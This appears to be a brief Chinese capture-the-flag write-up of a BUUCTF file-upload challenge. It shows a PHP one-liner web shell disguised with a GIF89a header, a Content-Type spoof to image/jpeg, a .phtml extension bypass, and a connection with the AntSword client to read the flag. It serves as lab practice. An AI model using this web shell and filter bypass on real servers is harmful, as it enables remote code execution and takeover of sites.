打开靶机
随便提交了个图马
抓包
把contenttype改成image/jpeg之后上传发现
一句话木马里不能有<?,那重新找一个
GIF89a script language=phpeval($_REQUEST[1])script
设置的密码为1方便蚁剑连接
把文件格式改为phtml便于绕过
,上传然后抓包把contenttype再改一次然后发包上传成功
http://a3a27dc9-448a-4aee-95c9-2bd02ab60b5f.node4.buuoj.cn/upload/
打开发现上传成功
打开蚁剑
成功连接
从根目录找到flag
over